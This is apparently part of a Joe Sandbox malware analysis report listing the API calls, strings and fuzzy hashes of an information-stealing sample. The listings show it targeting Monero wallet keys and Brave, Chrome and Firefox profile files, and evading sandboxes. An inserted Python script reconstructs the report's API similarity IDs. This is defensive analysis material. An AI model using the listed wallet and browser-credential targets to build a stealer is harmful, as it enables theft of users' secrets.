                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                                  • ExitProcess.KERNEL32 ref: 00E41143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E410B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E410F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  APIs
                                    • Part of subcall function 00E578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                    • Part of subcall function 00E578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                    • Part of subcall function 00E578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                    • Part of subcall function 00E57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                    • Part of subcall function 00E57850: RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                    • Part of subcall function 00E57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                  • ExitProcess.KERNEL32 ref: 00E411C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  APIs
                                  • wsprintfA.USER32 ref: 00E538CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E538E3
                                  • lstrcat.KERNEL32(?,?), ref: 00E53935
                                  • StrCmpCA.SHLWAPI(?,00E60F70), ref: 00E53947
                                  • StrCmpCA.SHLWAPI(?,00E60F74), ref: 00E5395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E53C67
                                  • FindClose.KERNEL32(000000FF), ref: 00E53C7C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00E60B32,00E60B2B,00000000,?,?,?,00E613F4,00E60B2A), ref: 00E4BEF5
                                  • StrCmpCA.SHLWAPI(?,00E613F8), ref: 00E4BF4D
                                  • StrCmpCA.SHLWAPI(?,00E613FC), ref: 00E4BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00E4C7D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  APIs
                                  • wsprintfA.USER32 ref: 00E5492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                  • StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                  • StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E54580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E54587
                                  • wsprintfA.USER32 ref: 00E545A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E545BD
                                  • StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E545EB
                                  • StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E5468B
                                  • FindClose.KERNEL32(000000FF), ref: 00E546A0
                                  • lstrcat.KERNEL32(?,01CBF258), ref: 00E546C5
                                  • lstrcat.KERNEL32(?,01CBE1D8), ref: 00E546D8
                                  • lstrlen.KERNEL32(?), ref: 00E546E5
                                  • lstrlen.KERNEL32(?), ref: 00E546F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: f5d9634ed6cae163e8130e8a40994a56e9c1bbef57b375bb7147bb7806509704
                                  • Instruction ID: f51d67e89097dfb06947befb6acbf726d5944776eedb12d19a612f11cefe7cfa
                                  • Opcode Fuzzy Hash: f5d9634ed6cae163e8130e8a40994a56e9c1bbef57b375bb7147bb7806509704
                                  • Instruction Fuzzy Hash: 71517BB1654218DBC730EB70DC49FEE737CAB58305F405989B689A3184EB799788CFA1
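The "API ID" printed under Similarity for each function is a frequency signature of the API names in that function's APIs list, which is what makes it comparable across samples even when addresses and fuzzy hashes differ. The following Python is an added example, not part of this Joe Sandbox report, that reconstructs the ID from an APIs listing exactly as the entries on this page show it: split each API name into CamelCase tokens, count tokens over every listed call (subcall lines included), group by count from highest to lowest, sort each group in ASCII order (uppercase before lowercase), concatenate a group's tokens and join the groups with "$". The rules for dropping the Get/Rtl prefixes, the trailing A/W charset marker and the SHLWAPI StrCmpCA calls are inferred from the IDs on this page, not from Joe Sandbox documentation, and the numeric "API String ID" hash is not reproduced. The two inputs are copied from the directory-walker listing directly above and from the CopyFileA/DeleteFileA grabber listing further down.

```python
import re
from collections import Counter

# Constructed input, copied from the "APIs" listing of the heap-allocating
# directory walker above; its Similarity entry reads
# "Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf".
WALKER_APIS = r"""
GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E54580
RtlAllocateHeap.NTDLL(00000000), ref: 00E54587
wsprintfA.USER32 ref: 00E545A6
FindFirstFileA.KERNEL32(?,?), ref: 00E545BD
StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E545EB
StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54601
FindNextFileA.KERNEL32(000000FF,?), ref: 00E5468B
FindClose.KERNEL32(000000FF), ref: 00E546A0
lstrcat.KERNEL32(?,01CBF258), ref: 00E546C5
lstrcat.KERNEL32(?,01CBE1D8), ref: 00E546D8
lstrlen.KERNEL32(?), ref: 00E546E5
lstrlen.KERNEL32(?), ref: 00E546F6
"""

# Constructed input, copied from the file grabber (CopyFileA/DeleteFileA)
# listed further down; its entry reads
# "Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen".
GRABBER_APIS = r"""
Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E6510C,?,?,?,00E651B4,?,?,00000000,?,00000000), ref: 00E41923
StrCmpCA.SHLWAPI(?,00E6525C), ref: 00E41973
StrCmpCA.SHLWAPI(?,00E65304), ref: 00E41989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E41D40
DeleteFileA.KERNEL32(00000000), ref: 00E41DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00E41E20
FindClose.KERNEL32(000000FF), ref: 00E41E32
Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
"""

# Assumptions inferred from the IDs printed in this report, not from Joe Sandbox
# documentation: Get/Rtl prefixes and the trailing A/W charset marker are dropped,
# and SHLWAPI calls (StrCmpCA) are not counted, since no ID on the page contains
# a "Str" or "Cmp" token.
DROPPED_PREFIXES = ("Get", "Rtl")
IGNORED_MODULES = {"SHLWAPI"}
CALL_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")


def tokenize(api_name: str) -> list[str]:
    """'FindFirstFileA' -> ['Find', 'First', 'File']; 'lstrcat' -> ['lstrcat']."""
    for prefix in DROPPED_PREFIXES:
        rest = api_name[len(prefix):]
        if api_name.startswith(prefix) and rest[:1].isupper():
            api_name = rest
            break
    # Drop the ANSI/Unicode marker only when it follows a lowercase letter
    # (FindFirstFileA -> FindFirstFile), so a genuine capital is kept.
    if len(api_name) > 1 and api_name[-1] in "AW" and api_name[-2].islower():
        api_name = api_name[:-1]
    # CamelCase words become tokens; all-lowercase names such as lstrcat stay whole.
    return re.findall(r"[A-Z][a-z]+|[a-z]+", api_name) or [api_name]


def count_tokens(apis_text: str) -> Counter:
    """Count name tokens over every listed call, subcall lines included."""
    counts: Counter = Counter()
    for raw in apis_text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = CALL_RE.match(line)
        if not m:
            continue
        name, module = m.groups()
        if module.upper() in IGNORED_MODULES:
            continue
        counts.update(tokenize(name))
    return counts


def api_id(apis_text: str) -> str:
    """Group tokens by frequency (highest first), ASCII-sort inside each group,
    concatenate a group's tokens and join the groups with '$'."""
    by_count: dict[int, list[str]] = {}
    for token, n in count_tokens(apis_text).items():
        by_count.setdefault(n, []).append(token)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


if __name__ == "__main__":
    for label, apis in (("walker", WALKER_APIS), ("grabber", GRABBER_APIS)):
        print(f"{label}: {api_id(apis)}")
```

Because the ID is only a token histogram, two functions with the same set of calls in a different order, or with different string arguments, share an ID; the String ID and the two fuzzy hashes are what separate them. Paste the APIs list of a function from your own disassembly into `api_id` to check whether it matches one of the entries in this report before comparing fuzzy hashes.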
                                  APIs
                                  • wsprintfA.USER32 ref: 00E53EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E53EDA
                                  • StrCmpCA.SHLWAPI(?,00E60FAC), ref: 00E53F08
                                  • StrCmpCA.SHLWAPI(?,00E60FB0), ref: 00E53F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E5406C
                                  • FindClose.KERNEL32(000000FF), ref: 00E54081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 04217a1d2eedc2e4c6f2e7a389be027ca5b8e31f68bedd46f14d5af196653cc1
                                  • Instruction ID: e4399c999d29c06a939a570418065e0f4f7caa4cdf522e2b6b6880baed92b42a
                                  • Opcode Fuzzy Hash: 04217a1d2eedc2e4c6f2e7a389be027ca5b8e31f68bedd46f14d5af196653cc1
                                  • Instruction Fuzzy Hash: C0517BB1914218EBCB34EB70DC45EEE73BCBB48301F044589B699A7044DB799B89CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Fs'$6B"Y$7\$9&?$Vf|3$WS}o$gu]h$qoow$#^S$+1y$+1y$d[r$}T
                                  • API String ID: 0-1011748905
                                  • Opcode ID: 5bdc742f7263c74f5f67f2e7ea79964551102fbd8aaa59b691ac8ca323fe1327
                                  • Instruction ID: 7f8640fdb34c55bd3ff4aab45bcca2a5921592cc3ba3b418308fd7802d1c2d32
                                  • Opcode Fuzzy Hash: 5bdc742f7263c74f5f67f2e7ea79964551102fbd8aaa59b691ac8ca323fe1327
                                  • Instruction Fuzzy Hash: 25B218F360C204AFE304AE2DEC8567AF7E9EF94720F1A853DE5C4C7744E93558418696
                                  APIs
                                  • wsprintfA.USER32 ref: 00E4ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E4ED55
                                  • StrCmpCA.SHLWAPI(?,00E61538), ref: 00E4EDAB
                                  • StrCmpCA.SHLWAPI(?,00E6153C), ref: 00E4EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00E4F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 27ef478c46ffdebda5e13cfd894300ab1c9e6b679384dd2ed5b626d7f025a438
                                  • Instruction ID: 3f6db0568fce5fd503a8218d073a55fcbbc26983ffbce867dad1dcc4487e1e7d
                                  • Opcode Fuzzy Hash: 27ef478c46ffdebda5e13cfd894300ab1c9e6b679384dd2ed5b626d7f025a438
                                  • Instruction Fuzzy Hash: 2DE100729111189ADB58FB60DC56EEE73B8BF54301F4456E9B80A72092EE306F8ECF51
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615B8,00E60D96), ref: 00E4F71E
                                  • StrCmpCA.SHLWAPI(?,00E615BC), ref: 00E4F76F
                                  • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E4FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c28e33b1c6c7391763eefacf6c55776abea01dc412518d7edaffe83eda019c1a
                                  • Instruction ID: b2ade20853e80f0a4b5cf575064010140f5bbd6e17b12f532b9b8ebb204a987e
                                  • Opcode Fuzzy Hash: c28e33b1c6c7391763eefacf6c55776abea01dc412518d7edaffe83eda019c1a
                                  • Instruction Fuzzy Hash: 0AB165719001189BDB28FF60DC55AEE73B9AF94301F4496B9E80AB7141EF346B4DCB92
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E6510C,?,?,?,00E651B4,?,?,00000000,?,00000000), ref: 00E41923
                                  • StrCmpCA.SHLWAPI(?,00E6525C), ref: 00E41973
                                  • StrCmpCA.SHLWAPI(?,00E65304), ref: 00E41989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E41D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E41DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E41E20
                                  • FindClose.KERNEL32(000000FF), ref: 00E41E32
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 10b944173576c6549e3fa8c983bf88c37d9c7fed9baa28d0ba423e70c74ae536
                                  • Instruction ID: 87e2478dd16db369926eafe2a3c7ef889723d94e16550808e2801e64b448a871
                                  • Opcode Fuzzy Hash: 10b944173576c6549e3fa8c983bf88c37d9c7fed9baa28d0ba423e70c74ae536
                                  • Instruction Fuzzy Hash: A612D0729101189BDB19FB60DC96AEE73B8BF54301F445AA9B90672091EF306F8DCF91
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E60C2E), ref: 00E4DE5E
                                  • StrCmpCA.SHLWAPI(?,00E614C8), ref: 00E4DEAE
                                  • StrCmpCA.SHLWAPI(?,00E614CC), ref: 00E4DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00E4E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
